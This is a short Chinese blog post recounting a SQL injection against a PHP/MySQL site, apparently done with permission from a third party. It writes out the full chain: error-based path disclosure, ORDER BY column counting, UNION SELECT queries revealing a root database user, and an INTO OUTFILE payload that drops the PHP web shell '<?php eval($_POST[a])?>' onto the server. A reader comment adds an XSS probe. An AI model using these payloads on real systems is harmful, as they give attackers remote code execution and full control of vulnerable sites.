记一次Php+mysql注入点高权限写shell

作者:Adian 分类: 渗透实战 发布于:2018-5-1 15:11 ė304次浏览 62条评论

一个乐于助人的大牛给了我一个站让我练手
说走咱就走啊,一言不合就开车

1.jpg

and 1=2直接报错出了路径,这回我打码了,毕竟站是别人给的
然后order by 26返回正常
order by 27返回错误
于是我们
http://xxxx.com/article.php?wid=xxxx UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
没报错

2.jpg

然后在wid=这里加一个-
报错爆出 7 和10
然后开始查询user()
和database()
这时候我看到了了不得的东西
UNION SELECT 1,2,3,4,5,6,database(),version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
root!!!

3.jpg

然后就Happy了
直接UNION SELECT 1,2,3,4,5,6,'<?php eval($_POST[a])?>',version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile 'D:\\xxxxx\\xx.php'

4.jpg

 

当然,我还是要声明,我不是什么大牛,我也没说本文的技术点又多高
又防止某些狗追着咬我
然后再拿自己的龌龊思想揣测我
想学习web相关的话,我的观点是你需要学习PHP JS MYSQL一类的基础
不懂原理是不行的
会用明小子不算会注入
脚本语言需要,编程语言也需要

 

本文出自 A.的博客,转载时请注明出处及相应链接。

0
分享本文至:

评论

  1. 熟人哦 2018-05-01 21:27 回复

    看到留言板就想到xss,不知道有没有
    what

  2. 熟人哦 2018-05-01 21:25 回复

    看到留言板就想到xss,不知道有没有
    <script>alert(1)</script>

发表评论

电子邮件地址不会被公开。必填项已用*标注